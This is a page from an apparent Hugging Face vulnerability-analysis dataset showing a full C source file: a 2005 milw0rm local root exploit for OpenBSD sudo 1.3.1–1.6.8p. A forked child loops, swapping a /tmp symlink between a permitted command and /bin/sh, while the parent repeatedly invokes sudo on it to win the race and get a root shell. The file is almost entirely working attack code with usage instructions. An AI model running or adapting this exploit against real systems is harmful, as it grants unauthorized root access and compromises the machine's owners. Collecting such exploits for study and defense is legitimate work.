Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1087.txt72 linesDownload Raw Back to exploits
1#include <stdio.h> 

2#include <stdlib.h> 

3#include <unistd.h> 

4#include <sysexits.h> 

5#include <sys/wait.h> 

6

7#define SUDO "/usr/bin/sudo" 

8#ifdef BUFSIZ 

9#undef BUFSIZ 

10#define BUFSIZ 128 

11#endif 

12

13/* 

14ANY MODIFIED REPUBLISHING IS RESTRICTED 

15OpenBSD sudo 1.3.1 - 1.6.8p local root exploit 

16Tested under OpenBSD 3.6 sudo 1.6.7p5 

17Vuln by OpenBSD errata, http://www.openbsd.org/errata.html 

18(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru 

19Race condition in path name, can take a while to exploit 

20Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince 

21Fck lamerz: Saint_I, nmalykh 

22All rights reserved. 

23ANY MODIFIED REPUBLISHING IS RESTRICTED 

24*/ 

25

26int main (int argc, char ** argv) 

27{ 

28pid_t pid; 

29void * buffer; 

30char * exec, * race, * path; 

31if(argc != 3) 

32{ 

33fprintf(stderr, "r57sudo.c by __blf\n"); 

34fprintf(stderr, "RusH Security Team\n"); 

35fprintf(stderr, "Usage: %s <sudo full path command> <sudo command>\n", 

36argv[0]); 

37fprintf(stderr, "e.g. ./r57sudo /bin/ls ls\n"); 

38return EX_USAGE; 

39} 

40pid = fork(); 

41if(pid == 0) 

42{ 

43while(1) 

44{ 

45exec = (char *)calloc(BUFSIZ, sizeof(char)); 

46race = (char *)calloc(BUFSIZ, sizeof(char)); 

47bzero(exec, sizeof(exec)); 

48snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]); 

49system((char *)exec); 

50bzero(race, sizeof(race)); 

51snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 

52system((char *)race); 

53bzero(race, sizeof(race)); 

54snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]); 

55system((char *)race); 

56bzero(race, sizeof(race)); 

57snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]); 

58system((char *)race); 

59} 

60} 

61if(pid > 0) 

62{ 

63while(1) 

64{ 

65path = (char *)calloc(BUFSIZ/2, sizeof(char)); 

66snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]); 

67system((char *)path); 

68} 

69} 

70} 

71

72// milw0rm.com [2005-07-04]